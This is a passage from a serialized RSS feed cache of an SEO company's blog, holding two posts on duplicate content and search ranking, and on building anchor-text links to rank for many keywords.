href=\"http://seodesignsolutions.com/blog/seo-resources/seo-information-retrieval\"><img class=\"aligncenter size-full wp-image-9652\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness.jpg\" alt=\"duplicate content\" width=\"425\" height=\"282\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness.jpg 425w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness-300x199.jpg 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" /></a></p>\n<p>Block segment analysis dictates the value of weight / ranking  factors a web page is given for a set portion of the page. For example, text in the header and footer of a document are treated differently than say text in the body section of a page.</p>\n<p>The header is given more weight than the footer and typically the body text is given more value than both (since that is where the page has the ability to distinguish itself from borrowed elements, i.e. navigation, etc.).<span id=\"more-1821\"></span></p>\n<p>The reason for this is simple, page composition dictates that proximity and distinction (the more unique one document is from another) by distinguishing your content, the better. Search engines can easily discern duplication (through shingle analysis, singular value decomposition, etc.) in areas such as navigation, sidebars/blogrolls with the same links and footers all using the same text. This has the tendency of diffuse a pages ranking potential.</p>\n<p>In order to leverage a page for <a href=\"http://www.seodesignsolutions.com\">SEO</a>, it must (1) get indexed and (2) stay indexed in order to pass its ideal <a href=\"http://seodesignsolutions.com/blog/seo/seo-theme-density-2/\">ranking factor</a>, be used to bridge ranking factor as a <a href=\"http://seodesignsolutions.com/blog/articles/hub-pages-for-seo/\">hub</a> by building <a href=\"http://seodesignsolutions.com/blog/seo-web-design/internal-links-are-you-making-the-most-of-yours/\">internal links</a> to and from that page. If search engines determine that your pages are redundant or ubiquitous the dampener kicks in algorithmically and the ranking factor can be suppressed via de-indexing or filters (<strong>like the supplemental index</strong>) as a basis of sequencing leaving the same repetitive hash mark (from document to document).</p>\n<p>This aspect of the ranking algorithm is based on the <a href=\"http://www.miislita.com/semantics/c-index-1.html\">c-index</a> whereby <a href=\"http://www.miislita.com/information-retrieval-tutorial/cosine-similarity-tutorial.html\">term weight</a> and similarity are used to assign relevance through <a href=\"http://mathworld.wolfram.com/SingularValueDecomposition.html\">singular value decomposition</a> as a base vector across web pages. If enough of the singular values are identified across the global collection of documents then you have co-occurrence (which may in this instance work against your ranking objectives).</p>\n<p>Duplication via a template or though tag pages that lack unique content can go supplemental in a secondary search index, if they are not nurtured with enough <a href=\"http://seodesignsolutions.com/blog/link-building/what-is-the-real-value-of-a-link/\">internal link flow</a>. The gist here is, the larger your website grows, the higher the probability of diffusing or diluting your global nodes / top ranking keywords (a.k.a <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/duplicate-content-and-shingle-analysis-for-seo/\">keyword cannibalization</a>) like an over-optimization penalty.</p>\n<p>Just like a base that shifts to accommodate scalability, the foundation (like a triangle) must continue to broaden its base if the vertical threshold continues to rise. Similarly, the more pages you add about (1) topic A shift the focus from topic B. The common thread in most websites is the navigation (which if left to a simplistic ontology is not sufficient to feed an entire website).</p>\n<p>You can stem a websites topic into multiple topics, however each has a threshold to cross and moving on many fronts requires more inbound links and internal stability though secondary navigation to <a href=\"http://seodesignsolutions.com/blog/seo/using-seo-to-sculpt-relevance-for-keyword-prominence/\">sculpt the on page factors</a> that identify each segments (to pass value).</p>\n<p>This is why <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization-myths/you-cant-buy-credibility/\">virtual theming</a> (linking from relevant keywords in one document to another document) is so important. It allows the ranking factor to transfer link weight to the champion page through term frequency which essentially raises the bar in how search engines will interpret each respective keyword when considering it for retrieval.</p>\n<p>Deep linking (acquiring inbound links to a specific page vs. just the homepage) is equally as beneficial for eliminating the tendency for pages to go supplemental (or lose ranking factor as a unique asset). When you spread a site too thin (expand the content through automation) such as using a shopping cart that pulls similar values from a database. You must ensure that you have the ability to customize data (titles, h1, and content) to make each page distinct enough to add additional leverage to your primary, secondary and tertiary keywords that define your website.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=5cAozBpoIes:1bPFb7KHJek:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/5cAozBpoIes\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:446:\"Often you hear about the need to prevent duplicate content within your own website as it applies to SEO, but why? This is our take on why creating uniquely distinct nodes on each page is imperative for your content to produce not only context, but rankings as opposed to tripping search engine filters. Block segment <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:84:\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"13\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:79:\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\";}s:7:\"summary\";s:446:\"Often you hear about the need to prevent duplicate content within your own website as it applies to SEO, but why? This is our take on why creating uniquely distinct nodes on each page is imperative for your content to produce not only context, but rankings as opposed to tripping search engine filters. Block segment <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:6111:\"<p>Often you hear about the need to prevent duplicate content within your own website as it applies to <a href=\"http://www.seodesignsolutions.com/\">SEO</a>, but why? This is our take on why creating uniquely distinct nodes on each page is imperative for your content to produce not only context, but rankings as opposed to tripping search engine filters.</p>\n<p><a href=\"http://seodesignsolutions.com/blog/seo-resources/seo-information-retrieval\"><img class=\"aligncenter size-full wp-image-9652\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness.jpg\" alt=\"duplicate content\" width=\"425\" height=\"282\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness.jpg 425w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness-300x199.jpg 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" /></a></p>\n<p>Block segment analysis dictates the value of weight / ranking  factors a web page is given for a set portion of the page. For example, text in the header and footer of a document are treated differently than say text in the body section of a page.</p>\n<p>The header is given more weight than the footer and typically the body text is given more value than both (since that is where the page has the ability to distinguish itself from borrowed elements, i.e. navigation, etc.).<span id=\"more-1821\"></span></p>\n<p>The reason for this is simple, page composition dictates that proximity and distinction (the more unique one document is from another) by distinguishing your content, the better. Search engines can easily discern duplication (through shingle analysis, singular value decomposition, etc.) in areas such as navigation, sidebars/blogrolls with the same links and footers all using the same text. This has the tendency of diffuse a pages ranking potential.</p>\n<p>In order to leverage a page for <a href=\"http://www.seodesignsolutions.com\">SEO</a>, it must (1) get indexed and (2) stay indexed in order to pass its ideal <a href=\"http://seodesignsolutions.com/blog/seo/seo-theme-density-2/\">ranking factor</a>, be used to bridge ranking factor as a <a href=\"http://seodesignsolutions.com/blog/articles/hub-pages-for-seo/\">hub</a> by building <a href=\"http://seodesignsolutions.com/blog/seo-web-design/internal-links-are-you-making-the-most-of-yours/\">internal links</a> to and from that page. If search engines determine that your pages are redundant or ubiquitous the dampener kicks in algorithmically and the ranking factor can be suppressed via de-indexing or filters (<strong>like the supplemental index</strong>) as a basis of sequencing leaving the same repetitive hash mark (from document to document).</p>\n<p>This aspect of the ranking algorithm is based on the <a href=\"http://www.miislita.com/semantics/c-index-1.html\">c-index</a> whereby <a href=\"http://www.miislita.com/information-retrieval-tutorial/cosine-similarity-tutorial.html\">term weight</a> and similarity are used to assign relevance through <a href=\"http://mathworld.wolfram.com/SingularValueDecomposition.html\">singular value decomposition</a> as a base vector across web pages. If enough of the singular values are identified across the global collection of documents then you have co-occurrence (which may in this instance work against your ranking objectives).</p>\n<p>Duplication via a template or though tag pages that lack unique content can go supplemental in a secondary search index, if they are not nurtured with enough <a href=\"http://seodesignsolutions.com/blog/link-building/what-is-the-real-value-of-a-link/\">internal link flow</a>. The gist here is, the larger your website grows, the higher the probability of diffusing or diluting your global nodes / top ranking keywords (a.k.a <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/duplicate-content-and-shingle-analysis-for-seo/\">keyword cannibalization</a>) like an over-optimization penalty.</p>\n<p>Just like a base that shifts to accommodate scalability, the foundation (like a triangle) must continue to broaden its base if the vertical threshold continues to rise. Similarly, the more pages you add about (1) topic A shift the focus from topic B. The common thread in most websites is the navigation (which if left to a simplistic ontology is not sufficient to feed an entire website).</p>\n<p>You can stem a websites topic into multiple topics, however each has a threshold to cross and moving on many fronts requires more inbound links and internal stability though secondary navigation to <a href=\"http://seodesignsolutions.com/blog/seo/using-seo-to-sculpt-relevance-for-keyword-prominence/\">sculpt the on page factors</a> that identify each segments (to pass value).</p>\n<p>This is why <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization-myths/you-cant-buy-credibility/\">virtual theming</a> (linking from relevant keywords in one document to another document) is so important. It allows the ranking factor to transfer link weight to the champion page through term frequency which essentially raises the bar in how search engines will interpret each respective keyword when considering it for retrieval.</p>\n<p>Deep linking (acquiring inbound links to a specific page vs. just the homepage) is equally as beneficial for eliminating the tendency for pages to go supplemental (or lose ranking factor as a unique asset). When you spread a site too thin (expand the content through automation) such as using a shopping cart that pulls similar values from a database. You must ensure that you have the ability to customize data (titles, h1, and content) to make each page distinct enough to add additional leverage to your primary, secondary and tertiary keywords that define your website.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=5cAozBpoIes:1bPFb7KHJek:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/5cAozBpoIes\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:3;a:13:{s:5:\"title\";s:66:\"How to Build Links and Optimize your Website for Multiple Keywords\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/fMke79EeF5s/\";s:8:\"category\";s:137:\"Search Engine OptimizationGoogle-Link-Building-Optimization-StrategyGoogle-SEOHow-to-Optimize-Website-for-Multiple-Keywordsseo-techniques\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 03 May 2017 05:00:26 PDT\";s:4:\"guid\";s:133:\"http://www.seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:14799:\"<p>In case you were wondering how to systematically achieve saturation for <strong>multiple keywords</strong> for your website in search engines (instead of just a few) using <a href=\"http://www.seodesignsolutions.com/\">SEO</a>, then this is a must read post. This tactic is specifically designed to work in Google using the allinanchor / keyword relevance ratio to back links pointing at your site.<br />\n<a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\"><img src=\"http://seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords.jpg\" alt=\"\" title=\"Optimizing Multiple Keywords\" width=\"400\" height=\"275\" class=\"aligncenter size-full wp-image-617\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords-300x206.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a><br />\nThis is the point where the competition gets nervous as a tactic like this could go viral with just one post from a popular Stumbler, Digg or otherwise. I will leave that at your discretion to cast your vote, but this is not the first time where I should have simply shut up, but I thought I would leave you with some good reading material for the weekend.<span id=\"more-93\"></span></p>\n<p>As an <a href=\"http://www.seodesignsolutions.com/seo/\">SEO</a> company involved in this illustrious industry, I feel like we owe those sincere seekers who yearn for legitimate <a href=\"http://www.seodesignsolutions.com\">SEO</a> techniques and only find dozens of sites with shallow posts, vague references and theory. I don&#8217;t mind sharing a few tactics here and there about <a href=\"http://seodesignsolutions.com/blog/how-to-reference-material/optimizing-your-website-for-multiple-keywords/\">keyword optimization</a>, as the tendency to create, test and implement them typically happens faster than I can write them down. </p>\n<p>This post in essence serves as a web-log of a fundamental technique, that we have used time and time again to bolster <a href=\"http://www.seodesignsolutions.com/seo-services.html\">multiple top 10 positions</a> in search engines.  Naturally, we have to hold back something, otherwise we would make the SEO community obsolete, but in any case, these tactics are what we use when targeting an entire industry for long tail search engine domination, they can also be used for more aggressive/competitive terms by <a href=\"http://seodesignsolutions.com/blog/link-building/should-you-build-links-for-competitive-terms-or-the-long-tail-of-search/\">using this tactic</a>. </p>\n<p>But, in the even that you wish to rank in the top 10 for a result that has 1.2 &#8211; 1.8 million results, you can essentially pick them off like flies using just a fragment of this technique. The terms we consider worthy are usually the ones that takes months to acquire. So, don&#8217;t build links to fast from off topic locations, it&#8217;s better to focus on quality vs. quantity, however having a diverse base of IP addresses to use is ideal (such as an article marketing resource box that you can moderate) Hmmmmm. </p>\n<p><strong>The exercise:</strong></p>\n<p>1. First start off by writing down every possible singular keyword that pertains to your industry. From there narrow it down to the top 20-30 terms. </p>\n<p>You could also just use a keyword discovery tool, but in this instance, think like a consumer trying to reach your site. The reason is, many of the search terms used to reach your site are unique and do not fall into realm of showing up on the &#8220;keyword radar&#8221;, so common sense can equal conversion if you pick the right phrase and beat your competition to the punch.</p>\n<p>2. Then after you have a list of 20-30, start combining two word combinations strategically using the premise of how you think someone may type a query into a search engine.</p>\n<p>web page optimization, optimize my website, how do I SEO my site, etc&#8230; come up with your wild card list of key phrases which you can have fun with later, since if you optimize your site for one group of keywords ALL OF THE KEYWORDS in the anchor text get a boost. So even though you may be <a href=\"http://www.seodesignsolutions.com/link-submissions-services.html\">building links</a> using exact match, you still get the benefit of each individual word in Google.</p>\n<p>3. After you have your list of 30 singular, 20 two-word combinations and 10 or so three-word combinations (just seeing if you were paying attention, since I didn&#8217;t say anything about the 3 word combinations) take each of the two and three word combinations, place the phrases &#8220;in quotes&#8221; and enter them in a standard Google search query one at a time. </p>\n<p>Look at the results of the keywords in quotes and this will give you a good indication of the allinanchor and allintitle relevance by using the quotes. Usually if you do this, you can remove the quotes and 90% of the sites remain the same. Without quotes it may be 1-10 of 2,000,000 results, with &#8220;the quotes&#8221; it may show 1-10 of 20,000. It is the term in quotes you want to look at in order to gain a metric on the competitiveness of this key phrase.</p>\n<p>Also, the more words you add, the easier it is to optimize, even if the chronology of the words does not make sense, you are still optimizing your site for any combination of keywords that are contained in the anchor text. In case it&#8217;s a new term, <a href=\"http://seodesignsolutions.com/blog/seo-marketing/how-to-use-article-marketing-for-building-links-traffic-seo-visibility/\">this is anchor text</a>, so use it wisely as it is your number 1 tool for developing links, relevance and rankings (for now at least) in Google.</p>\n<p>Getting back to the exercise, if the term comes back with under 100,000 results then move it into your to do list of links to build as a likely target for your SEO. Granted that this is merely one tactic, feel free to combine it with your own methods. Now, without giving away too many secrets, you will be responsible for finding ways to build links. </p>\n<p>Not just any links, but links that allow you to have control over the anchor text (the text in the link). Use these terms to whittle away at the root phrases building 100 links per keyword combination, then run analytics software of check out <a href=\"http://www.nichewatch.com/\">Niche Watch</a> and see where you stand using a before and after methodology. </p>\n<p>Every site is different, but say for example you have a PR6 site, you can skip most of these tactics and just put a keyword in your title tag, mention it a few times, build links from your own site to itself and dominate the SERPs. However, since we know that you are going to be challenging websites such as those in the SERPs as you step over them in concentration for allinanchor relevance as you specifically augment your site by fortifying it with keyword combinations, you can actually surpass a lazy or passive higher page rank site in this fashion. </p>\n<p>Our site for example can chip away and rise approximately 100,000 results per month for competitive terms using moderate link building methods (1000-2000 quality inbound links per month for example), so if we were going after a super competitive keyword such as <a href=\"http://www.google.com/search?hl=en&amp;client=firefox-a&amp;rls=org.mozilla%3Aen-US%3Aofficial&amp;hs=4gI&amp;q=%22seo+company%22&amp;btnG=Search\">&#8220;SEO Company&#8221;</a> for example with it&#8217;s 1.4 million results, it would take roughly 1 year to build links to get to the top 10 using this tactic. </p>\n<p>Each site is different as the authority that results from each link varies. The point here is, each website has a link velocity ratio that is consistent with how aggressively it can move up the rungs until it arrives in the top 10 search results for a keyword &#8220;in quotes&#8221;.</p>\n<p>If you wanted to find out where you stand for the keyword in advance, you could always click your url first, then use the search command <a href=\"http://www.google.com/ie?&amp;num=100\">www.google.com/ie?&amp;num=100</a> to get to the 100 results per page stripped down Google interface. From there (since you have clicked your link in advance) you can put the keyword in question &#8220;in quotes&#8221;, hit return and find out where you stand. </p>\n<p>If you are position #200 for example and you are building links for every word that comprises the phrase (services SEO, SEO Services, Search engine Optimization Services, Engine Optimization SEO, etc.) then you should see your ranking move up and up closer to the top 10 for a number of terms. </p>\n<p>When it hits the top 10 for the allinanchor: terms, if the keyword is not being challenged directly by another competitor your site should hit the top 10 as well. If there is competition you should be in the top 30 or top 20 results and you will have to figure out which other SEO factor <a href=\"http://seodesignsolutions.com/blog/seo-web-design/are-your-seo-on-page-factors-holding-you-back/\">is holding you back</a> from there.</p>\n<p>If you wanted to be more specific and chart your progress, you can find the link to link velocity ratio to determine how many links or how much time it will take you to crack into the top 10 for each of the respective search terms.  Or you could find the best page for each link using the Google command site:www.yoursite.com keyword, to increase the links per page (<a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/link-building-deep-links-using-the-lpp-ratio/\">LPP ratio</a>) as a deep linking strategy to increase the impact of each link (don&#8217;t forget to socially bookmark them as well for an added boost).</p>\n<p>This is how you get your rankings to spread out to other terms. *If you use exact match terms for two word key phrases, then you can see the results usually within a week. The idea is, start with three words, when you see them moving, then alternate one of the keywords with another word from your list from before. So you can rank for keyword keyword company, keyword keyword services, keyword keyword professional, etc.</p>\n<p>Examples like SEO Marketing Consultant, SEO Website Marketing, Internet SEO Marketing, etc&#8230; this will become apparent later just how effective this tactic can be for blanketing a plethora of terms. </p>\n<p>Then you focus specifically on the phrase you want to rank for, create a custom page using a keyword density tool or writing copy that utilizes the phrase one time in the title, one time in the h1 tag, one to 3 times in the document and continue to build links to that page with those keywords in the anchor text. This is the advantage of having a blog as you can camouflage your link building tactics under the guise of an informative post. I will just hint at SEO content copy writing here, but you get the gist (link bait, social media, social bookmarking / link building ahem, ahem).</p>\n<p>My suggestion, build 50 links to the page and move on to another term. Then give it a week or two and go back and <a href=\"http://www.nichewatch.com/\">check the status of the keywords</a> and how your allinanchor:, allintitle: and allintext: ratio&#8217;s are performing is contrast to the keyword combinations, make note of your progress and try to find your site in the SERPs again. You can go back to the Google interface and check or you can just scroll through the normal results to see where you stand.</p>\n<p>If the keywords you select are under 20,000 results, if your site has some authority you can take those over from just posting an <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/titles-and-tagging-for-seo-conversion-relevance/\">on topic post that is tagged properly</a> in your blog. But to sustain them, you have to feed the pages keyword combinations to keep them afloat in the SERPs. This also provides a cushion around them to help fend off competition from leap-frogging past you up the ladder.</p>\n<p>Acquisition (climbing the rungs) and defense from others can be done through varying the tactic slightly. Slow down once you have acquired a top 20 and let the link velocity push you up the ladder. Then you can build 1/3 of the links using the exact match terms until you hit the top 10. If you crack the top 10, then go back, add a few more occurrences of the keywords you want to rank for in your document/page. Add a few more links, wait a week and then see if that pushes you over the hump into the top 5.</p>\n<p>This method may seem a bit chaotic, but you get the gist, you can manage one keyword or several at the same time. The key is to use a common denominator as the pivotal term that is used to tie together all of the variations of the word stemmed singular, plural and adjective based keyword combinations until you have effectively saturated each keywords density in the external links to your site.</p>\n<p>You can always check on Google Webmaster tools which keywords have the highest occurrences that are directed at your site. The idea is, to build a base term, add a qualifier, then do this again and again, until all of your main keywords are essentially lodged in the anchor text pointing at your site from a wide variety of unique and Class C- IP addresses.</p>\n<p>For example if you did a search on a term like &#8220;seo professional&#8221; this term returns 126,000 results. If your site has a PR4 for example and you have content that supports this type of industry of jargon in your domain name, on your pages or in your page titles, you should already have some leverage for the term.</p>\n<p>Terms that have slight correlation to your site&#8217;s theme can be optimized, but the rate of which all depends on your website authority, the links you use and how much link juice they carry, where you point them, the competition and how algorithms see your link building techniques (natural or unnatural) if you invoke a penalty, you will not rank for that term for a while until it&#8217;s lifted, so it&#8217;s better not to get greedy and vary your titles, anchor text and pages when deep linking.</p>\n<p>I hope you found this information useful, if you did, then cast your vote to share it, sign up for the RSS feed or just enjoy&#8230;See you in the SERPs.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=fMke79EeF5s:vRkBGj361aA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/fMke79EeF5s\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:508:\"In case you were wondering how to systematically achieve saturation for multiple keywords for your website in search engines (instead of just a few) using SEO, then this is a must read post. This tactic is specifically designed to work in Google using the allinanchor / keyword relevance ratio to back links pointing at your <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:138:\"http://www.seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"58\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:133:\"http://www.seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\";}s:7:\"summary\";s:508:\"In case you were wondering how to systematically achieve saturation for multiple keywords for your website in search engines (instead of just a few) using SEO, then this is a must read post. This tactic is specifically designed to work in Google using the allinanchor / keyword relevance ratio to back links pointing at your <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:14799:\"<p>In case you were wondering how to systematically achieve saturation for <strong>multiple keywords</strong> for your website in search engines (instead of just a few) using <a href=\"http://www.seodesignsolutions.com/\">SEO</a>, then this is a must read post. This tactic is specifically designed to work in Google using the allinanchor / keyword relevance ratio to back links pointing at your site.<br />\n<a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\"><img src=\"http://seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords.jpg\" alt=\"\" title=\"Optimizing Multiple Keywords\" width=\"400\" height=\"275\" class=\"aligncenter size-full wp-image-617\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords-300x206.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a><br />\nThis is the point where the competition gets nervous as a tactic like this could go viral with just one post from a popular Stumbler, Digg or otherwise. I will leave that at your discretion to cast your vote, but this is not the first time where I should have simply shut up, but I thought I would leave you with some good reading material for the weekend.<span id=\"more-93\"></span></p>\n<p>As an <a href=\"http://www.seodesignsolutions.com/seo/\">SEO</a> company involved in this illustrious industry, I feel like we owe those sincere seekers who yearn for legitimate <a href=\"http://www.seodesignsolutions.com\">SEO</a> techniques and only find dozens of sites with shallow posts, vague references and theory. I don&#8217;t mind sharing a few tactics here and there about <a href=\"http://seodesignsolutions.com/blog/how-to-reference-material/optimizing-your-website-for-multiple-keywords/\">keyword optimization</a>, as the tendency to create, test and implement them typically happens faster than I can write them down. </p>\n<p>This post in essence serves as a web-log of a fundamental technique, that we have used time and time again to bolster <a href=\"http://www.seodesignsolutions.com/seo-services.html\">multiple top 10 positions</a> in search engines.  Naturally, we have to hold back something, otherwise we would make the SEO community obsolete, but in any case, these tactics are what we use when targeting an entire industry for long tail search engine domination, they can also be used for more aggressive/competitive terms by <a href=\"http://seodesignsolutions.com/blog/link-building/should-you-build-links-for-competitive-terms-or-the-long-tail-of-search/\">using this tactic</a>. </p>\n<p>But, in the even that you wish to rank in the top 10 for a result that has 1.2 &#8211; 1.8 million results, you can essentially pick them off like flies using just a fragment of this technique. The terms we consider worthy are usually the ones that takes months to acquire. So, don&#8217;t build links to fast from off topic locations, it&#8217;s better to focus on quality vs. quantity, however having a diverse base of IP addresses to use is ideal (such as an article marketing resource box that you can moderate) Hmmmmm. </p>\n<p><strong>The exercise:</strong></p>\n<p>1. First start off by writing down every possible singular keyword that pertains to your industry. From there narrow it down to the top 20-30 terms. </p>\n<p>You could also just use a keyword discovery tool, but in this instance, think like a consumer trying to reach your site. The reason is, many of the search terms used to reach your site are unique and do not fall into realm of showing up on the &#8220;keyword radar&#8221;, so common sense can equal conversion if you pick the right phrase and beat your competition to the punch.</p>\n<p>2. Then after you have a list of 20-30, start combining two word combinations strategically using the premise of how you think someone may type a query into a search engine.</p>\n<p>web page optimization, optimize my website, how do I SEO my site, etc&#8230; come up with your wild card list of key phrases which you can have fun with later, since if you optimize your site for one group of keywords ALL OF THE KEYWORDS in the anchor text get a boost. So even though you may be <a href=\"http://www.seodesignsolutions.com/link-submissions-services.html\">building links</a> using exact match, you still get the benefit of each individual word in Google.</p>\n<p>3. After you have your list of 30 singular, 20 two-word combinations and 10 or so three-word combinations (just seeing if you were paying attention, since I didn&#8217;t say anything about the 3 word combinations) take each of the two and three word combinations, place the phrases &#8220;in quotes&#8221; and enter them in a standard Google search query one at a time. </p>\n<p>Look at the results of the keywords in quotes and this will give you a good indication of the allinanchor and allintitle relevance by using the quotes. Usually if you do this, you can remove the quotes and 90% of the sites remain the same. Without quotes it may be 1-10 of 2,000,000 results, with &#8220;the quotes&#8221; it may show 1-10 of 20,000. It is the term in quotes you want to look at in order to gain a metric on the competitiveness of this key phrase.</p>\n<p>Also, the more words you add, the easier it is to optimize, even if the chronology of the words does not make sense, you are still optimizing your site for any combination of keywords that are contained in the anchor text. In case it&#8217;s a new term, <a href=\"http://seodesignsolutions.com/blog/seo-marketing/how-to-use-article-marketing-for-building-links-traffic-seo-visibility/\">this is anchor text</a>, so use it wisely as it is your number 1 tool for developing links, relevance and rankings (for now at least) in Google.</p>\n<p>Getting back to the exercise, if the term comes back with under 100,000 results then move it into your to do list of links to build as a likely target for your SEO. Granted that this is merely one tactic, feel free to combine it with your own methods. Now, without giving away too many secrets, you will be responsible for finding ways to build links. </p>\n<p>Not just any links, but links that allow you to have control over the anchor text (the text in the link). Use these terms to whittle away at the root phrases building 100 links per keyword combination, then run analytics software of check out <a href=\"http://www.nichewatch.com/\">Niche Watch</a> and see where you stand using a before and after methodology. </p>\n<p>Every site is different, but say for example you have a PR6 site, you can skip most of these tactics and just put a keyword in your title tag, mention it a few times, build links from your own site to itself and dominate the SERPs. However, since we know that you are going to be challenging websites such as those in the SERPs as you step over them in concentration for allinanchor relevance as you specifically augment your site by fortifying it with keyword combinations, you can actually surpass a lazy or passive higher page rank site in this fashion. </p>\n<p>Our site for example can chip away and rise approximately 100,000 results per month for competitive terms using moderate link building methods (1000-2000 quality inbound links per month for example), so if we were going after a super competitive keyword such as <a href=\"http://www.google.com/search?hl=en&amp;client=firefox-a&amp;rls=org.mozilla%3Aen-US%3Aofficial&amp;hs=4gI&amp;q=%22seo+company%22&amp;btnG=Search\">&#8220;SEO Company&#8221;</a> for example with it&#8217;s 1.4 million results, it would take roughly 1 year to build links to get to the top 10 using this tactic. </p>\n<p>Each site is different as the authority that results from each link varies. The point here is, each website has a link velocity ratio that is consistent with how aggressively it can move up the rungs until it arrives in the top 10 search results for a keyword &#8220;in quotes&#8221;.</p>\n<p>If you wanted to find out where you stand for the keyword in advance, you could always click your url first, then use the search command <a href=\"http://www.google.com/ie?&amp;num=100\">www.google.com/ie?&amp;num=100</a> to get to the 100 results per page stripped down Google interface. From there (since you have clicked your link in advance) you can put the keyword in question &#8220;in quotes&#8221;, hit return and find out where you stand. </p>\n<p>If you are position #200 for example and you are building links for every word that comprises the phrase (services SEO, SEO Services, Search engine Optimization Services, Engine Optimization SEO, etc.) then you should see your ranking move up and up closer to the top 10 for a number of terms. </p>\n<p>When it hits the top 10 for the allinanchor: terms, if the keyword is not being challenged directly by another competitor your site should hit the top 10 as well. If there is competition you should be in the top 30 or top 20 results and you will have to figure out which other SEO factor <a href=\"http://seodesignsolutions.com/blog/seo-web-design/are-your-seo-on-page-factors-holding-you-back/\">is holding you back</a> from there.</p>\n<p>If you wanted to be more specific and chart your progress, you can find the link to link velocity ratio to determine how many links or how much time it will take you to crack into the top 10 for each of the respective search terms.  Or you could find the best page for each link using the Google command site:www.yoursite.com keyword, to increase the links per page (<a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/link-building-deep-links-using-the-lpp-ratio/\">LPP ratio</a>) as a deep linking strategy to increase the impact of each link (don&#8217;t forget to socially bookmark them as well for an added boost).</p>\n<p>This is how you get your rankings to spread out to other terms. *If you use exact match terms for two word key phrases, then you can see the results usually within a week. The idea is, start with three words, when you see them moving, then alternate one of the keywords with another word from your list from before. So you can rank for keyword keyword company, keyword keyword services, keyword keyword professional, etc.</p>\n<p>Examples like SEO Marketing Consultant, SEO Website Marketing, Internet SEO Marketing, etc&#8230; this will become apparent later just how effective this tactic can be for blanketing a plethora of terms. </p>\n<p>Then you focus specifically on the phrase you want to rank for, create a custom page using a keyword density tool or writing copy that utilizes the phrase one time in the title, one time in the h1 tag, one to 3 times in the document and continue to build links to that page with 